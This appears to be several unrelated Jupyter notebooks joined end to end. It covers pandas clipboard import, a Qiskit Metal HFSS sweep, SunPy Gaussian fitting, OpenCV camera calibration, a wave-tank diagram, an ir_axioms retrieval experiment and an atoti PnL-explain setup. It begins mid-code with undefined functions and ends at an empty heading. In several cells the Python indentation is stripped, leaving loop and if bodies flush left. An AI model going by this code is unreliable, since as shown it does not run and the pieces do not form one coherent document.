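Xs, ys = make_classification(n_samples=500, n_features=4, random_state=0)
df_demo = pd.DataFrame(Xs, columns=['Glucose', 'BMI', 'Insulin', 'SkinThickness'])
df_demo['Outcome'] = ys

for cols in ([], ['Insulin'], ['SkinThickness'], ['Insulin', 'SkinThickness']):
    print(cols, round(auc_without(df_demo, cols), 3))
```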
***Copy from clipboard*** is a handy feature I use regularly. It helps me quickly get data into a dataframe. The data I am copying over to the clipboard is usually pretty tiny and most likely not saved anywhere. The data I am copying can be in notepad, Excel, or in a CSV file. If I am able to CTRL + C it, then I probably can throw it into a Pandas dataframe.
We start by getting the Pandas library loaded and ready to go.
```
import pandas as pd
import sys
```
Here are the versions of Python and Pandas I am currently on.
```
print('Python: ' + sys.version.split('|')[0])
print('Pandas: ' + pd.__version__)
```
This tutorial is also available in video form. I try to go in more detail in the notebook but the video is worth watching.
```
from IPython.display import YouTubeVideo
YouTubeVideo("tJuVU1b8ZkE")
```
<h2>Create Data and Copy to Clipboard</h2>
The first step I am going to do is open Excel. In the Excel file I am going to create two columns.
* cost
* key
The ***cost*** column will have numbers and the ***key*** column will have text.
Note that it isn't straightforward to show you what I did in Excel, but the picture below should give you a clue. After I created my two columns and populated them, I highlighted them and copied them to my clipboard. If in doubt, see the video above.
> Tip: Make sure your Notebook pictures are not dependent on external image files
The image function below actually ***converts the jpg into a base64 image***. This means the notebook no longer needs excel_copy.jpg: the image is embedded in the notebook itself and can be shared easily. If you try to run the cell below without the image file present, then yes, you will get an error.
```
from IPython.display import Image
Image(filename="excel_copy.jpg")
```
Now that we have our data copied to the clipboard, let's get it loaded into a dataframe!
```
df = pd.read_clipboard()
df
```
It is very important to immediately check your column data types. Pandas might make some wrong assumptions about your data: dates may be imported as text, and dollar signs or commas may be imported into your number fields.
The ***.info()*** method gives you a row count and the data types of the entire dataframe. ***cost*** came in as a number and the ***key*** column as type object, which basically means it came in as text. This is great news since we do not have to correct any data types.
```
df.info()
```
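Since clipboard contents vary from machine to machine, here is a reproducible miniature of the same dtype check using a small hand-built frame (values are made up; `read_clipboard` itself performs the same kind of type inference):

```python
import pandas as pd

# A tiny hand-built frame mimicking the clipboard data: numeric cost, text key.
df_demo = pd.DataFrame({'cost': [250, 300, 175], 'key': ['a', 'b', 'c']})

print(df_demo.dtypes)
# cost is inferred as an integer dtype and key as object (text).
```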
<h2>Copy from SQL</h2>
I have a local installation of Microsoft SQL Server, and we can use it to copy the result of a query. There are times when you'd rather move your data away ***from SQL and into Pandas***. We can easily do this by copying the results of the query to the clipboard.
In the background, I opened up SQL Server Management Studio, connected to a DB, and queried a table named data. The picture below shows you the output of the query and the act of copying to the clipboard.
```
Image(filename="sql_copy.jpg")
```
We will be importing three columns.
* Date - Holds daily dates of stock symbols
* Symbol - Holds stock symbols
* Volume - Holds volume of stocks for a specific date
And yes, we will be using the same ***read_clipboard*** function we used earlier.
```
df2 = pd.read_clipboard()
df2
```
Now notice that Pandas made a mistake: it imported the ***Date column as text***. We need the Date column to have a date data type. The other columns were imported without any issues.
```
df2.info()
```
Let's fix that issue so we can use the df2 dataframe for analysis. If the date field is not important to you, it doesn't matter and we can move on; but for me, I would definitely want this column in the correct data type.
Pandas comes with a handy function called ***to_datetime*** that converts whatever you throw at it to a date. Our Date column was already formatted like a date, so Pandas had no issue converting it from text to datetime. We also assign the converted values back to the Date column; if we did not, df2 would not be changed.
```
df2['Date'] = pd.to_datetime(df2['Date'])
```
We then confirm our code worked by re-running the .info() function. And Voila!
Just remember to ***check your data types*** when using the read_clipboard function. Happy coding!
```
df2.info()
```
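For reference, here is a reproducible miniature of the same conversion that needs no clipboard (all values are made up):

```python
import pandas as pd

# Made-up miniature of the SQL example: Date arrives as text.
demo = pd.DataFrame({'Date': ['2016-01-04', '2016-01-05'],
                     'Symbol': ['AAPL', 'AAPL'],
                     'Volume': [1000, 2000]})
print(demo['Date'].dtype)   # object -- i.e. text

demo['Date'] = pd.to_datetime(demo['Date'])
print(demo['Date'].dtype)   # datetime64[ns] after conversion
```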
<p class="text-muted">This tutorial was created by <a href="http://www.hedaro.com" target="_blank"><strong>HEDARO</strong></a></p>
# Sweeps - Eigenmode matrix
### Prerequisite
You need to have a working local installation of Ansys
## 1. Perform the necessary imports and create a QDesign in Metal first.
```
%load_ext autoreload
%autoreload 2
import qiskit_metal as metal
from qiskit_metal import designs, draw
from qiskit_metal import MetalGUI, Dict, Headings
from qiskit_metal.analyses.quantization import EPRanalysis
# Create the design in Metal
# Create a design by specifying the chip size and open Metal GUI.
design = designs.DesignPlanar({}, True)
design.chips.main.size['size_x'] = '2mm'
design.chips.main.size['size_y'] = '2mm'
gui = MetalGUI(design)
from qiskit_metal.qlibrary.qubits.transmon_pocket import TransmonPocket
from qiskit_metal.qlibrary.terminations.open_to_ground import OpenToGround
from qiskit_metal.qlibrary.tlines.meandered import RouteMeander
```
### In this example, the design consists of 1 qubit and 1 CPW connected to OpenToGround.
```
# Allow running the same cell here multiple times to overwrite changes
design.overwrite_enabled = True
# Remove all qcomponents from GUI.
design.delete_all_components()
# To demonstrate the quality-factor outputs easily, the
# substrate material is changed from the default silicon
# to FR4_epoxy.
design.chips.main.material = 'FR4_epoxy'
q1 = TransmonPocket(
design,
'Q1',
options=dict(pad_width='425 um',
pocket_height='650um',
hfss_inductance = '17nH',
connection_pads=dict(
readout=dict(loc_W=+1, loc_H=+1, pad_width='200um'))))
otg = OpenToGround(design,
'open_to_ground',
options=dict(pos_x='1.75mm', pos_y='0um', orientation='0'))
readout = RouteMeander(
design, 'readout',
Dict(
total_length='6 mm',
hfss_wire_bonds = True,
fillet='90 um',
lead=dict(start_straight='100um'),
pin_inputs=Dict(start_pin=Dict(component='Q1', pin='readout'),
end_pin=Dict(component='open_to_ground', pin='open')),
))
gui.rebuild()
gui.autoscale()
```
## 2 Metal passes information to 'hfss' simulator, and gets a solution matrix.
```
# Create a separate analysis object for the combined qbit+readout.
eig_qres = EPRanalysis(design, "hfss")
```
Prepare the data to pass as arguments to the method run_sweep().
run_sweep() will open the simulation software if it is not already open.
```
### for render_design()
# Render every QComponent in QDesign.
render_qcomps = []
# Identify which kind of pins in Ansys.
# Follow details from renderer in
# QHFSSRenderer.render_design.
# No pins are open, so don't need to utilize render_endcaps.
open_terminations = []
#List of tuples of jj's that shouldn't be rendered.
#Follow details from renderer in QHFSSRenderer.render_design.
render_ignored_jjs = []
# Either calculate a bounding box based on the location of
# rendered geometries or use chip size from design class.
box_plus_buffer = True
# For simulator hfss, the setup options are :
# min_freq_ghz, n_modes, max_delta_f, max_passes, min_passes, min_converged=None,
# pct_refinement, basis_order
# If you don't pass all the arguments, the default is determined by
# QHFSSRenderer's default_options.
# If a setup named "sweeper_em_setup" exists in the project, it will be deleted,
# and a new setup will be added.
eig_qres.sim.setup.name="sweeper_em_setup"
eig_qres.sim.setup.min_freq_ghz=4
eig_qres.sim.setup.n_modes=2
eig_qres.sim.setup.max_passes=15
eig_qres.sim.setup.min_converged = 2
eig_qres.sim.setup.max_delta_f = 0.2
eig_qres.setup.junctions.jj.rect = 'JJ_rect_Lj_Q1_rect_jj'
eig_qres.setup.junctions.jj.line = 'JJ_Lj_Q1_rect_jj_'
```
### - Connect to Ansys HFSS, eigenmode solution.
### - Rebuild QComponents in Metal.
### - Render QComponents within HFSS and setup.
### - Delete/Clear the HFSS between each calculation of solution matrix.
### - Calculate solution matrix for each value in option_sweep.
#### Return a dict and return code. If the return code is zero, there were no errors detected.
#### The dict has: key = each value used to sweep, value = data from simulators
#### This could take minutes based size of design.
```
#Note: The method will connect to Ansys, activate_eigenmode_design(), add_eigenmode_setup().
all_sweeps, return_code = eig_qres.run_sweep(readout.name,
'total_length',
['10mm', '11mm', '12mm'],
render_qcomps,
open_terminations,
ignored_jjs=render_ignored_jjs,
design_name="GetEigenModeSolution",
box_plus_buffer=box_plus_buffer
)
all_sweeps.keys()
# For example, just one group of solution data.
all_sweeps['10mm'].keys()
all_sweeps['10mm']
all_sweeps['10mm']['variables']
all_sweeps['10mm']['sim_variables']['convergence_t']
all_sweeps['10mm']['sim_variables']['convergence_f']
# Uncomment the next line to close the simulation software.
#eig_qres.sim.close()
# Uncomment next line if you would like to close the gui
#gui.main_window.close()
```
```
%matplotlib inline
```
# Solar Data Processing with Python Part II
Now we have a grasp of the basics of Python, but the whole reason for downloading Python in the first place was to analyze solar data. Let's take a closer look at examples of solar data analysis.
We will be using SunPy to access solar data. SunPy is a Python package designed to interface the powerful tools that exist in other Python libraries with current repositories of solar data. With SunPy we will show how to: download solar data sets from the VSO, calibrate to industry standards, and plot and overlay a time series.
# Fitting A Gaussian to Data.
One of the most common data types in solar data processing is a time series: a measurement of how one physical parameter changes as a function of time. This example shows how to fit a Gaussian to a spectral line, and it will be as "real world" as possible.
First, let's import some useful libraries.
```
from datetime import datetime, timedelta #we saw these in the last tutorial
import numpy as np
from astropy.io import fits #how to read .fits files
from astropy.modeling import models, fitting #some handy fitting tools from astropy
import matplotlib.pyplot as plt
from scipy.integrate import trapz #numerical itegration tool
import astropy.units as u #units!!
import sunpy #solar data analysis tools
import sunpy.data.sample #Data interaction tools
sunpy.data.download_sample_data() #Download some sample data
```
Next we need to load in the data set we want to work with:
```
filename = sunpy.data.sample.GBM_LIGHTCURVE
hdulist = fits.open(filename)
```
So what did we get when we opened the file? Let's take a look:
```
len(hdulist)
```
We got 4 items in the list. Let's take a look at the first one:
```
hdulist[0].header
```
It looks like this data is from the GBM instrument on the Fermi (formerly GLAST) telescope, measuring gamma rays. Let's take a look at the second item:
```
hdulist[1].header
```
Alright, now we are getting somewhere. This has data in units of 'keV' and max/min measurements. Let's take a look at the other elements of the list we got:
```
hdulist[2].header
hdulist[3].header
```
So it looks like we are working with energy-count data, temporal information, quality measurements, etc.
# Plotting Spectral Data
Let's take a look at some of the data we've got.
```
len(hdulist[2].data)
hdulist[2].data.names
hdulist[2].data["COUNTS"]
hdulist[2].data["COUNTS"].shape
```
There is a large array of counts at 128 different energies. Let's take a look at the lowest energy measurements:
```
plt.plot(hdulist[2].data["counts"][:,0])
```
So now we have a plot of counts over some period of time. We can see there is one major spike in the data. Let's filter the data so that we keep just the major peak without the spike.
```
w = np.logical_and(hdulist[2].data["counts"][:,0] > 300, hdulist[2].data["counts"][:,0] < 2000)
w
```
This function, "np.logical_and", is similar to a "where" statement in IDL. We can see that "w" is now an array of true and false values. To take a subsection of our data where our filter is true:
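A tiny stand-alone illustration of this boolean-mask idiom (the numbers here are arbitrary, not the GBM counts):

```python
import numpy as np

a = np.array([100, 500, 1500, 2500, 800])
mask = np.logical_and(a > 300, a < 2000)  # elementwise AND, like IDL's WHERE
print(mask)     # [False  True  True False  True]
print(a[mask])  # [ 500 1500  800]
```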
```
counts = hdulist[2].data["counts"][:,0][w]
plt.plot(counts)
counts
len(counts)
```
Now, it is good to attach units to data when you can. The header of the file tells us what the units are; in this case, counts are dimensionless.
# Fitting the data with a Gaussian
Now that we have extracted a detection feature from the full data set, let's fit it with a Gaussian. To do this we will make use of a couple of tools from astropy. We will initialize the Gaussian fit with some rough guesses (amplitude, center, standard deviation):
```
g_init = models.Gaussian1D(1500, 300, 100)
```
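If astropy were not available, SciPy's `curve_fit` could do the same job. A minimal sketch on synthetic, noiseless data (the `gaussian` helper and all numbers here are illustrative, not part of the original analysis):

```python
import numpy as np
from scipy.optimize import curve_fit

# Illustrative helper; the notebook itself uses astropy's Gaussian1D instead.
def gaussian(x, amplitude, mean, stddev):
    return amplitude * np.exp(-((x - mean) ** 2) / (2 * stddev ** 2))

# Synthetic, noiseless "counts", so the fit should recover the parameters.
x = np.arange(600)
y = gaussian(x, 1500.0, 300.0, 100.0)

# p0 plays the same role as the Gaussian1D(1500, 300, 100) initial guess.
popt, _ = curve_fit(gaussian, x, y, p0=[1000.0, 250.0, 80.0])
print(np.round(popt))  # approximately [1500. 300. 100.]
```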
Now let's define a fitting method and produce a fit:
```
fit_g = fitting.LevMarLSQFitter()
```
Since this fitting routine expects both X and Y coordinate data, we need to define an X vector:
```
t=np.arange(0,len(counts))
g = fit_g(g_init, t, counts)
```
Let's take a look at some of the qualities of our fitted gaussian:
```
g.mean
g.stddev
g.amplitude
g
```
Our guesses weren't too bad, but we overestimated the standard deviation by about a factor of 5. The variable 'g' holds the fitted parameters of our Gaussian, but it doesn't actually contain an array. To plot it over the data, we need to create an array of values. We will make an array from 0 to 1410 with 2820 points in it.
```
x = np.linspace(0, 1410, 2820)
```
To find the values of our fit at each location, it is easy:
```
y = g(x)
```
Now we can plot it:
```
plt.plot(counts)
plt.plot(x, y, linewidth=2)
```
That isn't a very good fit. If we chose a more clever way to filter our data, or possibly fit two gaussians that could improve things.
# Integrating under the curve
Let's find the area under the curve we just created. We can numerically integrate it easily:
```
intensity = trapz(y,x)
intensity
```
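As a sanity check on the trapezoidal rule, note that a Gaussian's analytic area is amplitude × stddev × √(2π). A small sketch with made-up parameters, using an explicit trapezoid sum (the same rule `trapz` applies, written out so it doesn't depend on a particular SciPy/NumPy version):

```python
import numpy as np

# Made-up parameters, chosen to resemble the fit above.
amplitude, mean, stddev = 1500.0, 300.0, 100.0
x = np.linspace(-400.0, 1000.0, 5001)
y = amplitude * np.exp(-((x - mean) ** 2) / (2 * stddev ** 2))

# Explicit trapezoidal rule -- the same thing trapz computes.
numeric = np.sum((y[1:] + y[:-1]) * np.diff(x)) / 2.0
analytic = amplitude * stddev * np.sqrt(2.0 * np.pi)
print(round(numeric), round(analytic))  # the two should agree closely
```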
```
%%HTML
<style> code {background-color : pink !important;} </style>
```
Camera Calibration with OpenCV
===
### Run the code in the cell below to extract object points and image points for camera calibration.
```
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
%matplotlib qt
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((6*8,3), np.float32)
objp[:,:2] = np.mgrid[0:8, 0:6].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob('calibration_wide/GO*.jpg')
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
img = cv2.imread(fname)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (8,6), None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Draw and display the corners
cv2.drawChessboardCorners(img, (8,6), corners, ret)
#write_name = 'corners_found'+str(idx)+'.jpg'
#cv2.imwrite(write_name, img)
cv2.imshow('img', img)
cv2.waitKey(500)
cv2.destroyAllWindows()
```
### If the above cell ran successfully, you should now have `objpoints` and `imgpoints` needed for camera calibration. Run the cell below to calibrate, calculate distortion coefficients, and test undistortion on an image!
```
import pickle
%matplotlib inline
# Test undistortion on an image
img = cv2.imread('calibration_wide/test_image.jpg')
img_size = (img.shape[1], img.shape[0])
# Do camera calibration given object points and image points
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size,None,None)
dst = cv2.undistort(img, mtx, dist, None, mtx)
cv2.imwrite('calibration_wide/test_undist.jpg',dst)
# Save the camera calibration result for later use (we won't worry about rvecs / tvecs)
dist_pickle = {}
dist_pickle["mtx"] = mtx
dist_pickle["dist"] = dist
pickle.dump( dist_pickle, open( "calibration_wide/wide_dist_pickle.p", "wb" ) )
#dst = cv2.cvtColor(dst, cv2.COLOR_BGR2RGB)
# Visualize undistortion
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(20,10))
ax1.imshow(img)
ax1.set_title('Original Image', fontsize=30)
ax2.imshow(dst)
ax2.set_title('Undistorted Image', fontsize=30)
```
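Under the hood, the distortion coefficients found by `calibrateCamera` parameterize a polynomial lens model. The sketch below illustrates only the simplified radial part of that model, with made-up coefficients; it is not OpenCV's full implementation, which also includes a k3 term and tangential coefficients p1, p2:

```python
import numpy as np

def radial_distort(xy, k1, k2):
    """Apply the simplified radial model x_d = x * (1 + k1*r^2 + k2*r^4)
    to normalized image coordinates (illustrative only)."""
    r2 = np.sum(xy ** 2, axis=1, keepdims=True)
    return xy * (1 + k1 * r2 + k2 * r2 ** 2)

# Made-up coefficients; k1 < 0 pulls off-center points inward.
pts = np.array([[0.0, 0.0], [0.1, 0.2], [0.5, 0.5]])
distorted = radial_distort(pts, k1=-0.2, k2=0.05)
print(distorted)  # the origin stays put; off-center points move toward it
```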
# Laboratory setup
```
import matplotlib.pyplot as plt
import numpy as np
```
## Parameters
```
# Width and height of individual panels of the ASIST tank
PANEL_WIDTH = 23/11
PANEL_HEIGHT = 2
# We have a total of 19 panels
SUSTAIN_WIDTH = 23
SUSTAIN_HEIGHT = 2
#resting water depth, need to fix KRD
H = 0.8
#irgason, combined positions from two runs
irgason1 = (7.15, SUSTAIN_HEIGHT - 0.6)
irgason2 = (9.55, SUSTAIN_HEIGHT - 0.6)
irgason3 = (11.98, SUSTAIN_HEIGHT - 0.6)
# UDM positions
udm = [3.40, 6.25, 8.85, 11.31, 13.96]
#wave wires (combined posistions from 2 runs)
wave_wire = [1.53, 6.14, 9.30, 10.80, 14.0]
#pressure ports (16.32 only on last run)
static_pressure = [1.68, 3.51, 5.34, 7.17, 9.00, 10.83, 12.66, 14.49, 16.32]
#Pitot + hotfilm
pitot = 9.85
fig = plt.figure(figsize=(16, 5))
ax = fig.add_subplot(111, xlim=(-1, SUSTAIN_WIDTH + 1), ylim=(0, SUSTAIN_HEIGHT))
for u in udm:
plt.plot(u, 1.94, 'ws', mec='k', ms=12, clip_on=False, zorder=5)
plt.plot([u, u - 0.1], [2, H], 'k:', lw=1)
plt.plot([u, u + 0.1], [2, H], 'k:', lw=1)
#irgason placement
plt.plot(irgason1[0], irgason1[1], 'k*', ms=12, clip_on=False, zorder=5)
plt.plot(irgason2[0], irgason2[1], 'k*', ms=12, clip_on=False, zorder=5)
plt.plot(irgason3[0], irgason3[1], 'k*', ms=12, clip_on=False, zorder=5)
#water
plt.plot([-0.5, SUSTAIN_WIDTH], [H, H], 'c-', lw=2)
plt.fill_between([-0.5, SUSTAIN_WIDTH], [H, H], color='c', alpha=0.5)
# beach
x = np.linspace(19,23, 30)
y = (-1/16)*(x-23)**2+1
plt.plot(x,y, 'k:', lw=3)
plt.text(18, -0.55, 'Porous beach', fontsize=16)
# inlet
plt.plot([-1, 0], [1, 1], 'k-', lw=3)
plt.plot([-0.5, -0.5], [0, 1], 'k-', lw=2)
plt.plot([-1, -0.5], [0.25, 0.25], 'k-', lw=2)
plt.arrow(-0.5, 1.5, 1, 0, width=0.2, head_width=0.5, clip_on=False, zorder=5)
plt.text(-1, 2.2, 'Wind inlet', zorder=10, fontsize=16, ha='center')
plt.text(-1, -0.55, 'Wavemaker', fontsize=16, ha='center')
# outlet
plt.plot([SUSTAIN_WIDTH, SUSTAIN_WIDTH], [0, 1], 'k-', lw=3)
plt.plot([SUSTAIN_WIDTH, SUSTAIN_WIDTH + 1], [1, 1], 'k-', lw=3)
plt.arrow(SUSTAIN_WIDTH - 1, 1.5, 1, 0, width=0.2, head_width=0.5, clip_on=False, zorder=5)
plt.text(SUSTAIN_WIDTH, 2.2, 'Outlet', fontsize=16)
# tank
plt.plot([-1, SUSTAIN_WIDTH + 1], [2, 2], 'k-', lw=3, clip_on=False)
plt.plot([-1, SUSTAIN_WIDTH], [0, 0], 'k-', lw=3, clip_on=False)
for w in wave_wire:
plt.plot(w, 1.94, 'kv', ms=12, clip_on=False, zorder=5)
plt.plot([w, w ], [2, 0], 'k', lw=1)
for p in static_pressure:
plt.plot(p, 2, 'wo', mec='k', ms=12, clip_on=False, zorder=5)
plt.plot(pitot, 1.2, 'kx', ms=12, clip_on=False, zorder=5)
plt.plot([pitot,pitot], [2, 0], 'k', linewidth = 3)
plt.plot(np.nan, np.nan, 'k*', ms=16, label='Sonic anemometer')
plt.plot(np.nan, np.nan, 'ws', mec='k', ms=16, label='Ultrasonic Distance Meter')
plt.plot(np.nan, np.nan, 'kv', ms=16, label="Wave Wire")
plt.plot(np.nan, np.nan, 'wo', mec='k', ms=16, label="Static Pressure Ports")
plt.plot(np.nan, np.nan, 'kx', ms=16, label="Pitot + hot-film")
plt.legend(bbox_to_anchor=(0.2, 0.8), bbox_transform=plt.gcf().transFigure,
prop={'size': 16}, ncol=3, fancybox=True, shadow=True)
plt.xlabel('Fetch [m]', fontsize=16)
plt.ylabel('Height [m]', fontsize=16)
plt.xlim(-1, 24)
plt.xticks(range(0, 24, 2))
ax.tick_params(axis='both', labelsize=16)
fig.subplots_adjust(left=0.1, bottom=0.2, top=0.7, right=0.95)
plt.savefig('laboratory_setup.png', dpi=300)
```
```
from sys import modules
IN_COLAB = 'google.colab' in modules
if IN_COLAB:
!pip install -q ir_axioms[examples] python-terrier
# Start/initialize PyTerrier.
from pyterrier import started, init
if not started():
init(tqdm="auto")
edition = 28
track = "deep.passages"
dataset_name = "msmarco-passage/trec-dl-2019/judged"
contents_field = "text"
depth = 10
from pyterrier.datasets import get_dataset
from ir_datasets import load
dataset = get_dataset(f"irds:{dataset_name}")
ir_dataset = load(dataset_name)
from pathlib import Path
cache_dir = Path("cache/")
index_dir = cache_dir / "indices" / dataset_name.split("/")[0]
result_dir = Path(
"/mnt/ceph/storage/data-in-progress/data-research/"
"web-search/web-search-trec/trec-system-runs"
) / f"trec{edition}" / track
result_files = list(result_dir.iterdir())
from pyterrier.index import IterDictIndexer
if not index_dir.exists():
indexer = IterDictIndexer(str(index_dir.absolute()))
indexer.index(
dataset.get_corpus_iter(),
fields=[contents_field]
)
from pyterrier.io import read_results
from pyterrier import Transformer
from tqdm.auto import tqdm
results = [
Transformer.from_df(read_results(result_file))
for result_file in tqdm(result_files, desc="Load results")
]
results_names = [result_file.stem.replace("input.", "") for result_file in result_files]
from ir_axioms.axiom import (
ArgUC, QTArg, QTPArg, aSL, PROX1, PROX2, PROX3, PROX4, PROX5, TFC1, TFC3, RS_TF, RS_TF_IDF, RS_BM25, RS_PL2, RS_QL,
AND, LEN_AND, M_AND, LEN_M_AND, DIV, LEN_DIV, M_TDC, LEN_M_TDC, STMC1, STMC1_f, STMC2, STMC2_f, LNC1, TF_LNC, LB1,
REG, ANTI_REG, ASPECT_REG, REG_f, ANTI_REG_f, ASPECT_REG_f
)
axioms = [
ArgUC(), # Very slow due to network access.
QTArg(), # Very slow due to network access.
QTPArg(), # Very slow due to network access.
aSL(),
LNC1(),
TF_LNC(),
LB1(),
PROX1(),
PROX2(),
PROX3(),
PROX4(),
PROX5(),
REG(),
REG_f(),
ANTI_REG(),
ANTI_REG_f(),
ASPECT_REG(),
ASPECT_REG_f(),
AND(),
LEN_AND(),
M_AND(),
LEN_M_AND(),
DIV(),
LEN_DIV(),
RS_TF(),
RS_TF_IDF(),
RS_BM25(),
RS_PL2(),
RS_QL(),
TFC1(),
TFC3(),
M_TDC(),
LEN_M_TDC(),
    STMC1(),  # Rather slow due to many similarity calculations.
    STMC1_f(),  # Rather slow due to many similarity calculations.
STMC2(),
STMC2_f(),
]
axiom_names = [axiom.name for axiom in axioms]
from ir_axioms.backend.pyterrier.experiment import AxiomaticExperiment
experiment = AxiomaticExperiment(
retrieval_systems=results,
topics=dataset.get_topics(),
qrels=dataset.get_qrels(),
index=index_dir,
dataset=ir_dataset,
contents_accessor=contents_field,
axioms=axioms,
axiom_names=axiom_names,
depth=depth,
filter_by_qrels=False,
filter_by_topics=False,
verbose=True,
cache_dir=cache_dir,
)
preferences = experiment.preferences
preferences.to_csv(f"trec-{edition}-{track}-preferences-all-axioms-depth-{depth}.csv")
```
## PnL Explain : Estimating PnL using sensitivities and Market Data
For more context and definitions around pnl explained, [check out our article on atoti.io](https://www.atoti.io/pnl-explained-with-atoti/).
### A few definitions:
- [Portfolio](https://www.investopedia.com/terms/p/portfolio.asp) refers to any collection of financial assets such as stocks, bonds and cash.
- [PnL](https://www.investopedia.com/terms/p/plstatement.asp) is a common term used in trading referring to the total "Profit and Loss" made by a portfolio over a certain time period.
- [Maturity date](https://www.investopedia.com/terms/m/maturitydate.asp) refers to the due date on which a borrower must pay back the principal of a debt, i.e. the initial amount of money borrowed.
- [Tenor](https://www.investopedia.com/terms/t/tenor.asp) refers to the length of time remaining in a contract, while maturity refers to the initial length of the agreement upon its inception. The tenor of a financial instrument declines over time, whereas its maturity remains constant.
- [Yield curve](https://www.investopedia.com/terms/y/yieldcurve.asp) is a graphical representation of interest rates per maturity date.
- [Sensitivity](https://www.investopedia.com/terms/s/sensitivity.asp) is the magnitude of a financial instrument's reaction to changes in underlying factors.
- [Greeks](https://www.investopedia.com/terms/g/greeks.asp) describes the different dimensions of risk involved in taking an options position.
- [Delta](https://www.investopedia.com/terms/d/delta.asp), in particular, is a first-order greek, and represents the ratio that compares the change in the price of an asset to the corresponding change in the price of its derivative. For example, if a stock option has a delta value of 0.75, this means that if the underlying stock increases in price by 1 dollar per share, the option on it will rise by 0.75 dollars per share.
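As a quick numeric check of the delta definition above (hypothetical numbers, for illustration only), the first-order option price change is just delta times the underlying move:

```python
def option_price_change(delta: float, underlying_move: float) -> float:
    """First-order (delta-only) estimate of an option's price change."""
    return delta * underlying_move

# A delta of 0.75 and a $1.00 rise in the stock imply a $0.75 rise in the option.
print(option_price_change(0.75, 1.00))  # → 0.75
```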
### Introduction
The PnL explain technique seeks to estimate the daily PnL from the change in the underlying risk factors.
In this case the risk factors are determined by the yield curve plotting interest rates for each tenor.
Usually, a portfolio risk manager monitors the risk factors that impact the portfolio rather than every position booked in it. To assess the portfolio's future value, the risk manager performs what-if analyses based on scenarios for the risk factor values.
In this notebook, we perform a simplified PnL Explained by using Delta (Δ) to represent our sensitivity instead of the full set of Greeks. We will use the various features of atoti to:
- Load data into a multi-dimensional cube
- Explore the Data using the embedded visualization or atoti UI
- Calculate Estimated PnL using sensitivities and Market Data
- Run multiple scenarios of the Yield Curve Stress Test
<div style="text-align: center;" ><a href="https://www.atoti.io/?utm_source=gallery&utm_content=pnl-explained" target="_blank" rel="noopener noreferrer"><img src="https://data.atoti.io/notebooks/banners/discover.png" alt="Try atoti"></a></div>
```
import atoti as tt
# Create an atoti session
session = tt.create_session(config={"user_content_storage": "content"})
```
## 1.1 Loading Data and creating ActivePivot multidimensional environment
### Creating atoti DataStore
There are many ways atoti can consume data. In this notebook, we will be using read_csv to load data into the datastores.
### Position Sensitivities
```
position_sensitivity = session.read_csv(
"s3://data.atoti.io/notebooks/pnl-explained/position_sensitivities.csv",
keys=["book_id", "instrument_code", "currency", "curve", "tenor"],
table_name="Position_Sensitivities",
)
# you can use head(n) to view the first n rows of the store.
# likewise, you can use position_sensitivity.columns to view the columns available in the store
# lastly, you can use {"columns": len(position_sensitivity.columns), "rows": len(position_sensitivity)} to view the number of rows and columns loaded into the table
position_sensitivity.head(5)
```
### Position Data
```
position_table = session.read_csv(
"s3://data.atoti.io/notebooks/pnl-explained/position_data.csv",
keys=["book_id", "instrument_code"],
table_name="Position",
)
position_table.head(5)
```
### Portfolio structure
```
trading_desk_table = session.read_csv(
"s3://data.atoti.io/notebooks/pnl-explained/trading_desk.csv",
keys=["book_id"],
table_name="Trading_Desk",
)
trading_desk_table.head(5)
```
### Market data
```
market_data_table = session.read_csv(
"s3://data.atoti.io/notebooks/pnl-explained/market_data.csv",
keys=["currency", "curve", "tenor"],
table_name="Market_Data",
)
market_data_table.head()
```
### Creating references between stores
We will proceed to set up references between the stores that we just created. We will perform the join from `position_sensitivity`.
```
position_sensitivity.join(trading_desk_table, mapping={"book_id": "book_id"})
position_sensitivity.join(
position_table, mapping={"book_id": "book_id", "instrument_code": "instrument_code"}
)
position_sensitivity.join(
market_data_table,
mapping={"currency": "currency", "curve": "curve", "tenor": "tenor"},
)
```
### Creating cube
We create the cube using the base store *position_sensitivity*.
Note that we have not passed in any mode in create_cube().
This means that a hierarchy will be automatically created for each non-numeric column and a measure for each numeric column.
```
cube = session.create_cube(position_sensitivity, "Position_Sensitivities")
```
We can see that all the stores are joined to the *Position Sensitivities* store, which is what we call the base store.
For a record to be reachable in the cube, it must exist in the base store.
```
cube.schema
```
### Explore the Data Set as a Cube
We have the option to visualize the cube in chart, feature-value, pivot-table or tabular.
Let's look at the sensitivity across currency for each asset class.
```
session.visualize()
```
### Adding business logic calculation
Let's assign a variable to the attributes of the cube, so that we can:
* create measures
* create hierarchies
```
m = cube.measures
h = cube.hierarchies
lvl = cube.levels
```
Let's inspect what hierarchies have been automatically generated during cube creation
```
h
```
Let's inspect what measures have been automatically generated during cube creation
```
m
```
### Creating Measures
From the *Market Data* store, we have the *start of day* and *end of day* value which we used to calculate the change in yields.
```
m["last.VALUE"] = tt.value(market_data_table["last"])
m["start_of_day.VALUE"] = tt.value(market_data_table["start_of_day"])
```
#### Parameter simulation setup
We are going to create a parameter simulation measure `last parameter` that will allow us to create fluctuations to the `last.VALUE`.
This measure will be added to the `last.VALUE` based on scenarios, at specific *tenor* and *currency* levels.
The default value of `last parameter` will be 0.0, hence zero fluctuation from the original value when not defined in the scenario.
We will label the curve derived from the original data set as *Last Curve*
```
curve_simulation = cube.create_parameter_simulation(
"Curve Simulation",
measure_name="last parameter",
default_value=0.0,
levels=[lvl["tenor"], lvl["currency"]],
base_scenario_name="Last Curve",
)
```
As the fluctuations will be by [basis points](https://www.investopedia.com/ask/answers/what-basis-point-bps/), let's format the `last parameter` to show 3 decimal points.
```
m["last parameter"].formatter = "DOUBLE[#.000]"
```
Taking in consideration the potential fluctuations in the `last.VALUE` induced by the simulation, let's compute the `effective last` as follows:
```
m["effective last"] = m["last.VALUE"] + m["last parameter"]
```
We will come back to the simulations later on in the notebook. For now, let's look at how we can compute our Theoretical Pnl.
#### Theoretical PnL
